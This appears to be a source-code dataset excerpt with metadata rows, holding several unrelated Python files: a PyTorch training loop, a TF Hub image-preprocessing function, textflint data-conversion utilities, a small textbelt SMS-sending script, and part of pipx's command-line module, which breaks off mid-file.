metric_logger = MetricLogger(delimiter=' ')
metric_logger.add_meter('lr', SmoothedValue(window_size=1, fmt='{value:.6f}'))
header = f'Epoch: [{epoch:03}/{cfg.epochs:03}]'
for data in metric_logger.log_every(trainloader, cfg.print_iter_freq, header):
images = data[0].cuda(non_blocking=True)
labels = data[1].cuda(non_blocking=True)
if mixup_fn is not None:
images, labels = mixup_fn(images, labels)
with torch.cuda.amp.autocast():
outputs = model(images)
loss = criterion(outputs, labels)
loss_value = loss.item()
if not math.isfinite(loss_value):
print(f'Loss is {loss_value}, stopping training')
sys.exit(1)
optimizer.zero_grad()
is_second_order = (hasattr(optimizer, 'is_second_order')) and (optimizer.is_second_order)
loss_scaler(
loss=loss,
optimizer=optimizer,
parameters=model.parameters(),
create_graph=is_second_order
)
torch.cuda.synchronize()
metric_logger.update(loss=loss_value)
metric_logger.update(lr=optimizer.param_groups[0]['lr'])
        # gather the stats from all processes
metric_logger.synchronize_between_processes()
print(f'Averaged stats: {metric_logger}')
lr_scheduler.step(epoch)
if epoch % cfg.save_epoch_freq == 0:
save_path = f'{os.getcwd()}/{cfg.model.model_name}_{cfg.data.name}_{epoch:03}ep.pth'
torch.save({
'model': model_without_dp.state_dict(),
'optimizer': optimizer.state_dict(),
'lr_scheduler': lr_scheduler.state_dict(),
'scaler': loss_scaler.state_dict(),
'epoch': epoch
}, save_path)
save_path = f'{os.getcwd()}/{cfg.model.model_name}_{cfg.data.name}_{epoch:03}ep.pth'
torch.save({
'model': model_without_dp.state_dict(),
'optimizer': optimizer.state_dict(),
'lr_scheduler': lr_scheduler.state_dict(),
'scaler': loss_scaler.state_dict(),
'epoch': epoch
}, save_path)
if __name__ == '__main__':
main()
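# Illustrative note (not in the original script) on the linear LR scaling in
# main(): cfg.optim.args.lr is multiplied by batch_size / 512, so e.g.
#
#     base_lr, batch_size = 5e-4, 256
#     print(base_lr * batch_size / 512.0)   # 0.00025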
| 35.728571
| 101
| 0.644542
|
import os, sys
import math
import hydra
import torch
import timm
from hydra.utils import instantiate
from timm.loss import LabelSmoothingCrossEntropy, SoftTargetCrossEntropy
from timm.utils import NativeScaler
import models
from data import create_dataloader
from utils import MetricLogger, SmoothedValue
from utils import fix_random_seed
@hydra.main(config_path='./configs', config_name='pretrain')
def main(cfg):
if cfg.seed is not None:
fix_random_seed(cfg.seed)
torch.backends.cudnn.benchmark = True
trainloader, num_classes = create_dataloader(cfg.data)
mixup_fn = None
mixup_enable = (cfg.data.mixup.mixup_alpha > 0.) or (cfg.data.mixup.cutmix_alpha > 0.)
if mixup_enable:
mixup_fn = instantiate(cfg.data.mixup, num_classes=num_classes)
print(f'MixUp/Cutmix was enabled\n')
model = instantiate(cfg.model, num_classes=num_classes)
print(f'Model[{cfg.model.model_name}] was created')
model = torch.nn.parallel.DataParallel(model)
model.cuda()
model_without_dp = model.module
scaled_lr = cfg.optim.args.lr * cfg.data.loader.batch_size / 512.0
cfg.optim.args.lr = scaled_lr
optimizer = instantiate(cfg.optim, model=model)
print(f'Optimizer: \n{optimizer}\n')
lr_scheduler, _ = instantiate(cfg.scheduler, optimizer=optimizer)
print(f'Scheduler: \n{lr_scheduler}\n')
if cfg.data.mixup.mixup_alpha > 0.:
criterion = SoftTargetCrossEntropy().cuda()
print('SoftTargetCrossEntropy is used for criterion\n')
elif cfg.data.mixup.label_smoothing > 0.:
criterion = LabelSmoothingCrossEntropy(cfg.data.mixup.label_smoothing).cuda()
print('LabelSmoothingCrossEntropy is used for criterion\n')
else:
criterion = torch.nn.CrossEntropyLoss().cuda()
print('CrossEntropyLoss is used for criterion\n')
loss_scaler = NativeScaler()
start_epoch = 1
if cfg.resume is not None:
checkpoint = torch.load(cfg.resume, map_location='cpu')
model_without_dp.load_state_dict(checkpoint['model'])
optimizer.load_state_dict(checkpoint['optimizer'])
lr_scheduler.load_state_dict(checkpoint['lr_scheduler'])
loss_scaler.load_state_dict(checkpoint['scaler'])
start_epoch = checkpoint['epoch'] + 1
print(f'Resume was loaded from {cfg.resume}\n')
print(f'Start training for {cfg.epochs} epochs')
for epoch in range(start_epoch, cfg.epochs + 1):
model.train()
metric_logger = MetricLogger(delimiter=' ')
metric_logger.add_meter('lr', SmoothedValue(window_size=1, fmt='{value:.6f}'))
header = f'Epoch: [{epoch:03}/{cfg.epochs:03}]'
for data in metric_logger.log_every(trainloader, cfg.print_iter_freq, header):
images = data[0].cuda(non_blocking=True)
labels = data[1].cuda(non_blocking=True)
if mixup_fn is not None:
images, labels = mixup_fn(images, labels)
with torch.cuda.amp.autocast():
outputs = model(images)
loss = criterion(outputs, labels)
loss_value = loss.item()
if not math.isfinite(loss_value):
print(f'Loss is {loss_value}, stopping training')
sys.exit(1)
optimizer.zero_grad()
is_second_order = (hasattr(optimizer, 'is_second_order')) and (optimizer.is_second_order)
loss_scaler(
loss=loss,
optimizer=optimizer,
parameters=model.parameters(),
create_graph=is_second_order
)
torch.cuda.synchronize()
metric_logger.update(loss=loss_value)
metric_logger.update(lr=optimizer.param_groups[0]['lr'])
metric_logger.synchronize_between_processes()
print(f'Averaged stats: {metric_logger}')
lr_scheduler.step(epoch)
if epoch % cfg.save_epoch_freq == 0:
save_path = f'{os.getcwd()}/{cfg.model.model_name}_{cfg.data.name}_{epoch:03}ep.pth'
torch.save({
'model': model_without_dp.state_dict(),
'optimizer': optimizer.state_dict(),
'lr_scheduler': lr_scheduler.state_dict(),
'scaler': loss_scaler.state_dict(),
'epoch': epoch
}, save_path)
save_path = f'{os.getcwd()}/{cfg.model.model_name}_{cfg.data.name}_{epoch:03}ep.pth'
torch.save({
'model': model_without_dp.state_dict(),
'optimizer': optimizer.state_dict(),
'lr_scheduler': lr_scheduler.state_dict(),
'scaler': loss_scaler.state_dict(),
'epoch': epoch
}, save_path)
if __name__ == '__main__':
main()
| true
| true
|
f70b445e1cc3bd08d98868de9c00c440790bf47c
| 5,633
|
py
|
Python
|
deep_autoviml/preprocessing/preprocessing_images.py
|
chekoduadarsh/deep_autoviml
|
157fbdc2611dc0fbaee5fc4ebebe3e7c1eeb9b52
|
[
"Apache-2.0"
] | 1
|
2021-12-15T17:11:24.000Z
|
2021-12-15T17:11:24.000Z
|
deep_autoviml/preprocessing/preprocessing_images.py
|
chekoduadarsh/deep_autoviml
|
157fbdc2611dc0fbaee5fc4ebebe3e7c1eeb9b52
|
[
"Apache-2.0"
] | null | null | null |
deep_autoviml/preprocessing/preprocessing_images.py
|
chekoduadarsh/deep_autoviml
|
157fbdc2611dc0fbaee5fc4ebebe3e7c1eeb9b52
|
[
"Apache-2.0"
] | null | null | null |
#Copyright 2021 Google LLC
#Licensed under the Apache License, Version 2.0 (the "License");
#you may not use this file except in compliance with the License.
#You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
#Unless required by applicable law or agreed to in writing, software
#distributed under the License is distributed on an "AS IS" BASIS,
#WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#See the License for the specific language governing permissions and
#limitations under the License.
############################################################################################
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import tempfile
import pdb
import copy
import warnings
warnings.filterwarnings(action='ignore')
import functools
from itertools import combinations
from collections import defaultdict
# Make numpy values easier to read.
np.set_printoptions(precision=3, suppress=True)
############################################################################################
# data pipelines and feature engg here
# pre-defined TF2 Keras models and your own models here
from deep_autoviml.data_load.classify_features import check_model_options
# Utils
############################################################################################
# TensorFlow ≥2.4 is required
import tensorflow as tf
np.random.seed(42)
tf.random.set_seed(42)
from tensorflow.keras import layers
from tensorflow import keras
from tensorflow.keras.layers.experimental.preprocessing import Normalization, StringLookup, Hashing
from tensorflow.keras.layers.experimental.preprocessing import IntegerLookup, CategoryEncoding, CategoryCrossing
from tensorflow.keras.layers.experimental.preprocessing import TextVectorization, Discretization
from tensorflow.keras.layers import Embedding, Flatten
from tensorflow.keras.optimizers import SGD, Adam, RMSprop
from tensorflow.keras import layers
from tensorflow.keras import optimizers
from tensorflow.keras.models import Model, load_model
from tensorflow.keras import callbacks
from tensorflow.keras import backend as K
from tensorflow.keras import utils
from tensorflow.keras.layers import BatchNormalization
from tensorflow.keras.optimizers import SGD
from tensorflow.keras import regularizers
import tensorflow_hub as hub
import tensorflow_text as text
from sklearn.metrics import roc_auc_score, mean_squared_error, mean_absolute_error
from IPython.core.display import Image, display
import pickle
#############################################################################################
##### Suppress all TF2 and TF1.x warnings ###################
try:
tf.logging.set_verbosity(tf.logging.ERROR)
except:
tf.compat.v1.logging.set_verbosity(tf.compat.v1.logging.ERROR)
############################################################################################
from tensorflow.keras.layers import Reshape, MaxPooling1D, MaxPooling2D, AveragePooling2D, AveragePooling1D
from tensorflow.keras import Model, Sequential
from tensorflow.keras.layers import Activation, Dense, Embedding, GlobalAveragePooling1D, GlobalMaxPooling1D, Dropout, Conv1D
from tensorflow.keras.layers.experimental.preprocessing import TextVectorization
############################################################################################
def preprocessing_images(train_ds, model_options):
"""
    This builds an image-preprocessing pipeline for an incoming tf.data.Dataset of images.
    Send in a tf.data.Dataset from the training folder and a model_options dictionary.
    It returns a compiled Keras Sequential model (Rescaling + TF Hub feature extractor +
    Dropout + softmax head) ready to train or to reuse as the image branch of a larger model.
########### Motivation and suggestions for coding for Image processing came from this blog #########
Greatly indebted to Srivatsan for his Github and notebooks: https://github.com/srivatsan88/YouTubeLI
####################################################################################################
"""
try:
####### L O A D F E A T U R E E X T R A C T O R ################
url = "https://tfhub.dev/google/tf2-preview/mobilenet_v2/feature_vector/4"
feature_extractor = check_model_options(model_options, "tf_hub_model", url)
img_height = model_options["image_height"]
img_width = model_options["image_width"]
image_channels = model_options["image_channels"]
num_predicts = model_options["num_predicts"]
try:
feature_extractor_layer = hub.KerasLayer(feature_extractor, input_shape=(
img_height,img_width,image_channels))
except:
print('Loading model from Tensorflow Hub failed. Check the URL and try again...')
return
feature_extractor_layer.trainable = False
normalization_layer = tf.keras.layers.experimental.preprocessing.Rescaling(1./255)
tf.random.set_seed(111)
model = tf.keras.Sequential([
normalization_layer,
feature_extractor_layer,
tf.keras.layers.Dropout(0.3),
tf.keras.layers.Dense(num_predicts,activation='softmax')
])
model.compile(
optimizer='adam',
loss=tf.losses.SparseCategoricalCrossentropy(from_logits=True),
metrics=['accuracy'])
except:
print(' Error: Failed image preprocessing layer. Returning...')
return
return model
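# Illustrative usage sketch (not in the original file): model_options only
# needs the keys read above; train_ds is never touched inside the function,
# and check_model_options is assumed to fall back to the default TF Hub URL
# when "tf_hub_model" is absent:
#
#     opts = {"image_height": 224, "image_width": 224,
#             "image_channels": 3, "num_predicts": 10}
#     model = preprocessing_images(train_ds=None, model_options=opts)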
| 48.145299
| 126
| 0.648322
| true
| true
|
|
f70b453634eac4dbf2a64b4b70be55fdf1b7ac80
| 3,993
|
py
|
Python
|
evaluation/scripts/textflint_utils/utils.py
|
zpapakipos/dynabench-1
|
95884b4e29c57263dc1a85909be979c084d5fac3
|
[
"MIT"
] | 15
|
2021-09-24T00:46:04.000Z
|
2022-03-16T13:24:56.000Z
|
evaluation/scripts/textflint_utils/utils.py
|
zpapakipos/dynabench-1
|
95884b4e29c57263dc1a85909be979c084d5fac3
|
[
"MIT"
] | 98
|
2021-09-22T12:33:21.000Z
|
2022-03-21T22:23:52.000Z
|
evaluation/scripts/textflint_utils/utils.py
|
zpapakipos/dynabench-1
|
95884b4e29c57263dc1a85909be979c084d5fac3
|
[
"MIT"
] | 12
|
2021-09-25T05:08:18.000Z
|
2022-02-28T21:02:20.000Z
|
# Copyright (c) Facebook, Inc. and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
# Convert data to textflint format and run transform functions in textflint
import glob
import json
import os
from textflint import Engine
CONFIG_PATH = "textflint_utils/configs"
TRANSFORM_FIELDS = {
"nli": {"context": "premise", "hypothesis": "hypothesis"},
"sentiment": {"statement": "x"},
"hs": {"statement": "x"},
"qa": {"context": "context", "question": "question"},
}
LABEL_FIELD = {"nli": "label", "sentiment": "label", "hs": "label", "qa": "answer"}
LABEL_MAP = {
"nli": {
"neutral": "neutral",
"contradictory": "contradiction",
"entailed": "entailment",
},
"sentiment": {"positive": "positive", "negative": "negative", "neutral": "neutral"},
"hs": {"hateful": "hateful", "not-hateful": "not-hateful"},
}
def findall(p, s):
# Yields all the positions of the pattern p in the string s.
i = s.find(p)
while i != -1:
yield i
i = s.find(p, i + 1)
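# e.g. list(findall("an", "banana")) == [1, 3]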
# This converts dynabench dataset to textflint format
def reformat_data_to_textflint(samples, task):
converted_samples = []
perturb_fields = TRANSFORM_FIELDS.get(task, None)
label_map = LABEL_MAP.get(task, None)
for i in range(len(samples)):
sample = samples[i]
converted = {"sample_id": i + 1}
if task == "qa":
answer = sample["answer"]
            if isinstance(answer, list):
answers = set(answer)
else:
answers = [answer]
converted["answers"] = []
for answer in answers:
converted["answers"] += [
{"text": answer, "answer_start": i}
for i in findall(answer, sample["context"])
]
converted["title"] = ""
converted["is_impossible"] = False
else:
converted["y"] = label_map[sample["label"]]
for key, value in perturb_fields.items():
converted[value] = sample[key]
converted_samples.append(converted)
return converted_samples
def load_config(config_path):
config = None
with open(config_path) as f:
config = json.loads(f.read())
return config
def get_orig_value(data, sample, field):
return data[sample["sample_id"]][field]
def get_transformed_data(config_path, data, task):
config = load_config(config_path)
out_dir = config["out_dir"]
out_files = os.listdir(out_dir)
trans_samples = []
perturb_fields = TRANSFORM_FIELDS.get(task, None)
label_field = LABEL_FIELD.get(task, None)
for fname in out_files:
if fname.startswith("ori"):
continue
fname = os.path.join(out_dir, fname)
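        # e.g. (hypothetical filename) "out/trans_SwapAnt_1.json" splits into
        # ["out/trans", "SwapAnt", "1.json"], giving new_suffix "SwapAnt"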
parts = fname.split("_")
new_suffix = "_".join(parts[1:-1])
with open(fname) as f:
for line in f:
sample = json.loads(line)
trans_sample = {"input_id": get_orig_value(data, sample, "uid")}
trans_sample[label_field] = get_orig_value(data, sample, label_field)
for key, value in perturb_fields.items():
trans_sample[key] = sample[value]
                # create a unique uid for each new example
trans_sample["uid"] = str(trans_sample["input_id"]) + "_" + new_suffix
trans_samples.append(trans_sample)
return trans_samples
def run_textflint(data, task):
textflint_data = reformat_data_to_textflint(data, task)
engine = Engine()
config_file = os.path.join(CONFIG_PATH, task + "_config.json")
config = load_config(config_file)
out_dir = config["out_dir"]
files = glob.glob(out_dir + "/*")
for f in files:
os.remove(f)
engine.run(textflint_data, config_file)
perturbed_data = get_transformed_data(config_file, data, task)
return perturbed_data
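# Hedged usage sketch (illustration only; the sample below and a "qa_config.json"
# under CONFIG_PATH are assumptions):
# data = [{"uid": "ex-1", "context": "Paris is in France.",
#          "question": "Where is Paris?", "answer": "France"}]
# perturbed = run_textflint(data, "qa")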
| 32.201613
| 88
| 0.60556
|
import glob
import json
import os
from textflint import Engine
CONFIG_PATH = "textflint_utils/configs"
TRANSFORM_FIELDS = {
"nli": {"context": "premise", "hypothesis": "hypothesis"},
"sentiment": {"statement": "x"},
"hs": {"statement": "x"},
"qa": {"context": "context", "question": "question"},
}
LABEL_FIELD = {"nli": "label", "sentiment": "label", "hs": "label", "qa": "answer"}
LABEL_MAP = {
"nli": {
"neutral": "neutral",
"contradictory": "contradiction",
"entailed": "entailment",
},
"sentiment": {"positive": "positive", "negative": "negative", "neutral": "neutral"},
"hs": {"hateful": "hateful", "not-hateful": "not-hateful"},
}
def findall(p, s):
i = s.find(p)
while i != -1:
yield i
i = s.find(p, i + 1)
def reformat_data_to_textflint(samples, task):
converted_samples = []
perturb_fields = TRANSFORM_FIELDS.get(task, None)
label_map = LABEL_MAP.get(task, None)
for i in range(len(samples)):
sample = samples[i]
converted = {"sample_id": i + 1}
if task == "qa":
answer = sample["answer"]
            if isinstance(answer, list):
answers = set(answer)
else:
answers = [answer]
converted["answers"] = []
for answer in answers:
converted["answers"] += [
{"text": answer, "answer_start": i}
for i in findall(answer, sample["context"])
]
converted["title"] = ""
converted["is_impossible"] = False
else:
converted["y"] = label_map[sample["label"]]
for key, value in perturb_fields.items():
converted[value] = sample[key]
converted_samples.append(converted)
return converted_samples
def load_config(config_path):
config = None
with open(config_path) as f:
config = json.loads(f.read())
return config
def get_orig_value(data, sample, field):
return data[sample["sample_id"]][field]
def get_transformed_data(config_path, data, task):
config = load_config(config_path)
out_dir = config["out_dir"]
out_files = os.listdir(out_dir)
trans_samples = []
perturb_fields = TRANSFORM_FIELDS.get(task, None)
label_field = LABEL_FIELD.get(task, None)
for fname in out_files:
if fname.startswith("ori"):
continue
fname = os.path.join(out_dir, fname)
parts = fname.split("_")
new_suffix = "_".join(parts[1:-1])
with open(fname) as f:
for line in f:
sample = json.loads(line)
trans_sample = {"input_id": get_orig_value(data, sample, "uid")}
trans_sample[label_field] = get_orig_value(data, sample, label_field)
for key, value in perturb_fields.items():
trans_sample[key] = sample[value]
trans_sample["uid"] = str(trans_sample["input_id"]) + "_" + new_suffix
trans_samples.append(trans_sample)
return trans_samples
def run_textflint(data, task):
textflint_data = reformat_data_to_textflint(data, task)
engine = Engine()
config_file = os.path.join(CONFIG_PATH, task + "_config.json")
config = load_config(config_file)
out_dir = config["out_dir"]
files = glob.glob(out_dir + "/*")
for f in files:
os.remove(f)
engine.run(textflint_data, config_file)
perturbed_data = get_transformed_data(config_file, data, task)
return perturbed_data
| true
| true
|
f70b468eed83845185b750bee867ad6d6a0b97d5
| 679
|
py
|
Python
|
smsarch.py
|
archzets/smsarch
|
b4fc69890dfb84e4e8636ee65ad68128a62a0da9
|
[
"BSL-1.0"
] | null | null | null |
smsarch.py
|
archzets/smsarch
|
b4fc69890dfb84e4e8636ee65ad68128a62a0da9
|
[
"BSL-1.0"
] | null | null | null |
smsarch.py
|
archzets/smsarch
|
b4fc69890dfb84e4e8636ee65ad68128a62a0da9
|
[
"BSL-1.0"
] | null | null | null |
import requests
import pyfiglet
ascii_banner = pyfiglet.figlet_format("SMSARCH")
print(ascii_banner)
while True:
    kime = input("to:")
    mesaj = input("message:")
if " " in kime or mesaj == "":
break
    resp = requests.post('https://textbelt.com/text', {
        'phone': kime,
        'message': mesaj,
        'key': 'textbelt',
    })
    result = resp.json()
    print("Result: {} remaining quota: {}".format(
        'Successful' if result['success'] else 'failed!!!', result['quotaRemaining']))
    c = input("'exit()' or 'ENTER'")
    if c == "exit()":
        break
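# Note (hedged): textbelt's free 'textbelt' key is heavily rate-limited
# (reportedly one free message per day); a paid key raises the quota.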
| 28.291667
| 99
| 0.537555
|
import requests
import pyfiglet
ascii_banner = pyfiglet.figlet_format("SMSARCH")
print(ascii_banner)
while True:
    kime = input("to:")
    mesaj = input("message:")
if " " in kime or mesaj == "":
break
    resp = requests.post('https://textbelt.com/text', {
        'phone': kime,
        'message': mesaj,
        'key': 'textbelt',
    })
    result = resp.json()
    print("Result: {} remaining quota: {}".format(
        'Successful' if result['success'] else 'failed!!!', result['quotaRemaining']))
    c = input("'exit()' or 'ENTER'")
    if c == "exit()":
        break
| true
| true
|
f70b4712d4642d8fba04922d1c1c7b2949c947b8
| 27,320
|
py
|
Python
|
src/pipx/main.py
|
gotmax23/pipx
|
adb078cb9456c56da5f721da73c22df357a60bda
|
[
"MIT"
] | 1,244
|
2021-05-27T09:25:58.000Z
|
2022-03-31T19:03:41.000Z
|
src/pipx/main.py
|
gotmax23/pipx
|
adb078cb9456c56da5f721da73c22df357a60bda
|
[
"MIT"
] | 138
|
2021-05-27T09:47:41.000Z
|
2022-03-30T01:04:02.000Z
|
src/pipx/main.py
|
gotmax23/pipx
|
adb078cb9456c56da5f721da73c22df357a60bda
|
[
"MIT"
] | 97
|
2021-05-28T17:48:09.000Z
|
2022-03-30T00:31:32.000Z
|
# PYTHON_ARGCOMPLETE_OK
"""The command line interface to pipx"""
import argparse
import logging
import logging.config
import os
import re
import shlex
import sys
import textwrap
import time
import urllib.parse
from pathlib import Path
from typing import Any, Callable, Dict, List
import argcomplete # type: ignore
from packaging.requirements import InvalidRequirement, Requirement
from packaging.utils import canonicalize_name
import pipx.constants
from pipx import commands, constants
from pipx.animate import hide_cursor, show_cursor
from pipx.colors import bold, green
from pipx.constants import ExitCode
from pipx.emojis import hazard
from pipx.interpreter import DEFAULT_PYTHON
from pipx.util import PipxError, mkdir, pipx_wrap, rmdir
from pipx.venv import VenvContainer
from pipx.version import __version__
logger = logging.getLogger(__name__)
VenvCompleter = Callable[[str], List[str]]
def print_version() -> None:
print(__version__)
SPEC_HELP = textwrap.dedent(
"""\
The package name or specific installation source passed to pip.
Runs `pip install -U SPEC`.
For example `--spec mypackage==2.0.0` or `--spec git+https://github.com/user/repo.git@branch`
"""
)
PIPX_DESCRIPTION = textwrap.dedent(
f"""
Install and execute apps from Python packages.
Binaries can either be installed globally into isolated Virtual Environments
or run directly in a temporary Virtual Environment.
Virtual Environment location is {str(constants.PIPX_LOCAL_VENVS)}.
Symlinks to apps are placed in {str(constants.LOCAL_BIN_DIR)}.
"""
)
PIPX_DESCRIPTION += pipx_wrap(
"""
optional environment variables:
PIPX_HOME Overrides default pipx location. Virtual Environments will be installed to $PIPX_HOME/venvs.
PIPX_BIN_DIR Overrides location of app installations. Apps are symlinked or copied here.
USE_EMOJI Overrides emoji behavior. Default value varies based on platform.
PIPX_DEFAULT_PYTHON Overrides default python used for commands.
""",
subsequent_indent=" " * 24, # match the indent of argparse options
keep_newlines=True,
)
DOC_DEFAULT_PYTHON = os.getenv("PIPX__DOC_DEFAULT_PYTHON", DEFAULT_PYTHON)
INSTALL_DESCRIPTION = textwrap.dedent(
f"""
The install command is the preferred way to globally install apps
from python packages on your system. It creates an isolated virtual
environment for the package, then ensures the package's apps are
accessible on your $PATH.
The result: apps you can run from anywhere, located in packages
you can cleanly upgrade or uninstall. Guaranteed to not have
dependency version conflicts or interfere with your OS's python
packages. 'sudo' is not required to do this.
pipx install PACKAGE_NAME
pipx install --python PYTHON PACKAGE_NAME
pipx install VCS_URL
pipx install ./LOCAL_PATH
pipx install ZIP_FILE
pipx install TAR_GZ_FILE
The PACKAGE_SPEC argument is passed directly to `pip install`.
The default virtual environment location is {constants.DEFAULT_PIPX_HOME}
and can be overridden by setting the environment variable `PIPX_HOME`
(Virtual Environments will be installed to `$PIPX_HOME/venvs`).
The default app location is {constants.DEFAULT_PIPX_BIN_DIR} and can be
overridden by setting the environment variable `PIPX_BIN_DIR`.
The default python executable used to install a package is
{DOC_DEFAULT_PYTHON} and can be overridden
by setting the environment variable `PIPX_DEFAULT_PYTHON`.
"""
)
class LineWrapRawTextHelpFormatter(argparse.RawDescriptionHelpFormatter):
def _split_lines(self, text: str, width: int) -> List[str]:
text = self._whitespace_matcher.sub(" ", text).strip()
return textwrap.wrap(text, width)
class InstalledVenvsCompleter:
def __init__(self, venv_container: VenvContainer) -> None:
self.packages = [str(p.name) for p in sorted(venv_container.iter_venv_dirs())]
def use(self, prefix: str, **kwargs: Any) -> List[str]:
return [
f"{prefix}{x[len(prefix):]}"
for x in self.packages
if x.startswith(canonicalize_name(prefix))
]
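    # e.g. with self.packages == ["my-package"], use("my_") returns ["my_package"]:
    # canonicalize_name("my_") == "my-", so the match succeeds while preserving the
    # user's typed separator in the completion.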
def get_pip_args(parsed_args: Dict[str, str]) -> List[str]:
pip_args: List[str] = []
if parsed_args.get("index_url"):
pip_args += ["--index-url", parsed_args["index_url"]]
if parsed_args.get("pip_args"):
pip_args += shlex.split(parsed_args.get("pip_args", ""))
# make sure --editable is last because it needs to be right before
# package specification
if parsed_args.get("editable"):
pip_args += ["--editable"]
return pip_args
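# e.g. get_pip_args({"index_url": "https://pypi.org/simple", "editable": True})
# returns ["--index-url", "https://pypi.org/simple", "--editable"]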
def get_venv_args(parsed_args: Dict[str, str]) -> List[str]:
venv_args: List[str] = []
if parsed_args.get("system_site_packages"):
venv_args += ["--system-site-packages"]
return venv_args
def run_pipx_command(args: argparse.Namespace) -> ExitCode: # noqa: C901
verbose = args.verbose if "verbose" in args else False
pip_args = get_pip_args(vars(args))
venv_args = get_venv_args(vars(args))
venv_container = VenvContainer(constants.PIPX_LOCAL_VENVS)
if "package" in args:
package = args.package
if urllib.parse.urlparse(package).scheme:
raise PipxError("Package cannot be a url")
if "spec" in args and args.spec is not None:
if urllib.parse.urlparse(args.spec).scheme:
if "#egg=" not in args.spec:
args.spec = args.spec + f"#egg={package}"
venv_dir = venv_container.get_venv_dir(package)
logger.info(f"Virtual Environment location is {venv_dir}")
if "skip" in args:
skip_list = [canonicalize_name(x) for x in args.skip]
if args.command == "run":
package_or_url = (
args.spec
if ("spec" in args and args.spec is not None)
else args.app_with_args[0]
)
# For any package, we need to just use the name
try:
package_name = Requirement(args.app_with_args[0]).name
except InvalidRequirement:
# Raw URLs to scripts are supported, too, so continue if
# we can't parse this as a package
package_name = args.app_with_args[0]
use_cache = not args.no_cache
commands.run(
package_name,
package_or_url,
args.app_with_args[1:],
args.python,
pip_args,
venv_args,
args.pypackages,
verbose,
use_cache,
)
# We should never reach here because run() is NoReturn.
return ExitCode(1)
elif args.command == "install":
return commands.install(
None,
None,
args.package_spec,
constants.LOCAL_BIN_DIR,
args.python,
pip_args,
venv_args,
verbose,
force=args.force,
include_dependencies=args.include_deps,
suffix=args.suffix,
)
elif args.command == "inject":
return commands.inject(
venv_dir,
None,
args.dependencies,
pip_args,
verbose=verbose,
include_apps=args.include_apps,
include_dependencies=args.include_deps,
force=args.force,
)
elif args.command == "upgrade":
return commands.upgrade(
venv_dir,
pip_args,
verbose,
include_injected=args.include_injected,
force=args.force,
)
elif args.command == "upgrade-all":
return commands.upgrade_all(
venv_container,
verbose,
include_injected=args.include_injected,
skip=skip_list,
force=args.force,
)
elif args.command == "list":
return commands.list_packages(venv_container, args.include_injected, args.json)
elif args.command == "uninstall":
return commands.uninstall(venv_dir, constants.LOCAL_BIN_DIR, verbose)
elif args.command == "uninstall-all":
return commands.uninstall_all(venv_container, constants.LOCAL_BIN_DIR, verbose)
elif args.command == "reinstall":
return commands.reinstall(
venv_dir=venv_dir,
local_bin_dir=constants.LOCAL_BIN_DIR,
python=args.python,
verbose=verbose,
)
elif args.command == "reinstall-all":
return commands.reinstall_all(
venv_container,
constants.LOCAL_BIN_DIR,
args.python,
verbose,
skip=skip_list,
)
elif args.command == "runpip":
if not venv_dir:
raise PipxError("Developer error: venv_dir is not defined.")
return commands.run_pip(package, venv_dir, args.pipargs, args.verbose)
elif args.command == "ensurepath":
try:
return commands.ensure_pipx_paths(force=args.force)
except Exception as e:
logger.debug("Uncaught Exception:", exc_info=True)
raise PipxError(str(e), wrap_message=False)
elif args.command == "completions":
print(constants.completion_instructions)
return ExitCode(0)
else:
raise PipxError(f"Unknown command {args.command}")
def add_pip_venv_args(parser: argparse.ArgumentParser) -> None:
parser.add_argument(
"--system-site-packages",
action="store_true",
help="Give the virtual environment access to the system site-packages dir.",
)
parser.add_argument("--index-url", "-i", help="Base URL of Python Package Index")
parser.add_argument(
"--editable",
"-e",
help="Install a project in editable mode",
action="store_true",
)
parser.add_argument(
"--pip-args",
help="Arbitrary pip arguments to pass directly to pip install/upgrade commands",
)
def add_include_dependencies(parser: argparse.ArgumentParser) -> None:
parser.add_argument(
"--include-deps", help="Include apps of dependent packages", action="store_true"
)
def _add_install(subparsers: argparse._SubParsersAction) -> None:
p = subparsers.add_parser(
"install",
help="Install a package",
formatter_class=LineWrapRawTextHelpFormatter,
description=INSTALL_DESCRIPTION,
)
p.add_argument("package_spec", help="package name or pip installation spec")
add_include_dependencies(p)
p.add_argument("--verbose", action="store_true")
p.add_argument(
"--force",
"-f",
action="store_true",
help="Modify existing virtual environment and files in PIPX_BIN_DIR",
)
p.add_argument(
"--suffix",
default="",
help=(
"Optional suffix for virtual environment and executable names. "
"NOTE: The suffix feature is experimental and subject to change."
),
)
p.add_argument(
"--python",
default=DEFAULT_PYTHON,
help=(
"The Python executable used to create the Virtual Environment and run the "
"associated app/apps. Must be v3.6+."
),
)
add_pip_venv_args(p)
def _add_inject(subparsers, venv_completer: VenvCompleter) -> None:
p = subparsers.add_parser(
"inject",
help="Install packages into an existing Virtual Environment",
description="Installs packages to an existing pipx-managed virtual environment.",
)
p.add_argument(
"package",
help="Name of the existing pipx-managed Virtual Environment to inject into",
).completer = venv_completer
p.add_argument(
"dependencies",
nargs="+",
help="the packages to inject into the Virtual Environment--either package name or pip package spec",
)
p.add_argument(
"--include-apps",
action="store_true",
help="Add apps from the injected packages onto your PATH",
)
add_include_dependencies(p)
add_pip_venv_args(p)
p.add_argument(
"--force",
"-f",
action="store_true",
help="Modify existing virtual environment and files in PIPX_BIN_DIR",
)
p.add_argument("--verbose", action="store_true")
def _add_upgrade(subparsers, venv_completer: VenvCompleter) -> None:
p = subparsers.add_parser(
"upgrade",
help="Upgrade a package",
description="Upgrade a package in a pipx-managed Virtual Environment by running 'pip install --upgrade PACKAGE'",
)
p.add_argument("package").completer = venv_completer
p.add_argument(
"--include-injected",
action="store_true",
help="Also upgrade packages injected into the main app's environment",
)
p.add_argument(
"--force",
"-f",
action="store_true",
help="Modify existing virtual environment and files in PIPX_BIN_DIR",
)
add_pip_venv_args(p)
p.add_argument("--verbose", action="store_true")
def _add_upgrade_all(subparsers: argparse._SubParsersAction) -> None:
p = subparsers.add_parser(
"upgrade-all",
help="Upgrade all packages. Runs `pip install -U <pkgname>` for each package.",
description="Upgrades all packages within their virtual environments by running 'pip install --upgrade PACKAGE'",
)
p.add_argument(
"--include-injected",
action="store_true",
help="Also upgrade packages injected into the main app's environment",
)
p.add_argument("--skip", nargs="+", default=[], help="skip these packages")
p.add_argument(
"--force",
"-f",
action="store_true",
help="Modify existing virtual environment and files in PIPX_BIN_DIR",
)
p.add_argument("--verbose", action="store_true")
def _add_uninstall(subparsers, venv_completer: VenvCompleter) -> None:
